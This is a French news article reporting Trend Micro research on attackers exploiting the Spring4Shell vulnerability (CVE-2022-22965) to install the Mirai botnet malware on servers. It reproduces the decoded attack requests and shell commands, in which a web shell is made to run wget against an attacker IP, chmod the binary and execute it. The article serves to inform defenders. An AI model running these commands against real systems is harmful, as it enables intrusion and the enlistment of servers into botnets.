Une cybermenace peut en cacher une autre. La faille Spring4shell CVE-2022-22965, à corriger d'urgence et qui bénéficie depuis la semaine dernière d'un correctif, a été exploitée par des cyberpirates. Dans une recherche, l'éditeur en solutions de sécurité Trend Micro a précisé les risques associés à un défaut de patch Spring4shell qui débouche sur un accès complet aux terminaux compromis via de la prise en main à distance. Parmi les scénarios possibles : création d'un chemin d'accès initial pour effectuer des attaques de second niveau, fournir des moyens de diffusion de malwares pour extraire et exfiltrer de la donnée, réaliser des attaques par déni de service, déployer des logiciels de cryptominage, des ransomwares/cryptowares...

D'ores et déjà exploitée un peu partout dans le monde, cette vulnérabilité est aussi utilisée pour infecter des systèmes avec un malware bien connu, Mirai. Très actif il y a quelques années pour créer des botnets en enrôlant des objets connectés afin de lancer des attaques DDoS de grande ampleur, ce logiciel malveillant revient sous les projecteurs. « Nous avons observé une exploitation active de Spring4Shell dans laquelle des acteurs malveillants ont pu armer et exécuter le malware du botnet Mirai sur des serveurs vulnérables, en particulier dans la région de Singapour », ont indiqué les chercheurs de Trend Micro Deep Patel, Nitesh Surana et Ashish Verma. « Un sample de Mirai est téléchargé dans le dossier "/ tmp" et exécuté après le changement d'autorisation pour les rendre exécutables à l'aide de "chmod" ».

Des architectures x86 et ARM visées

Les requêtes et commandes d'exploitation qui ont été décodées sont les suivantes :

- http://{victimIP}:9090/tomcatwar[.]jsp?pwd=j&cmd=cd%20/tmp;%20 wget%20http://45[.]95[.]169[.]143/The420smokeplace[.] dns/KKveTTgaAAsecNNaaaa.x86;chmod%20777%20 *;./KKveTTgaAAsecNNaaaa.x86%20mSpring[.]x86
- cd/ tmp;wgethttp://45[.]95[.]169[.]143/ The420smokeplace.dns/KKveTTgaAAsecNNaaaa.x86; chmod 777 *; ./KKveTTgaAAsecNNaaaa.x86 mSpring[.]x86
- http://45[.]95[.]169[.]143/The420smokeplace[.]dns/KKveTTgaAAsecNNaaaa.x86

Les samples du malware Mirai ont été trouvés au début du mois d'avril 2022 incluant des fichiers fonctionnels pour tourner sur des différentes architectures processeurs et versions (x86, x86_64, arm4, arm5, arm6, arm7...). « Le script "wget.sh" télécharge les binaires depuis le serveur malveillant et exécute tous les sample. Ceux qui sont compatibles fonctionnent, les autre non. Après l'exécution, les fichiers sont supprimés du disque », poursuit Trend Micro.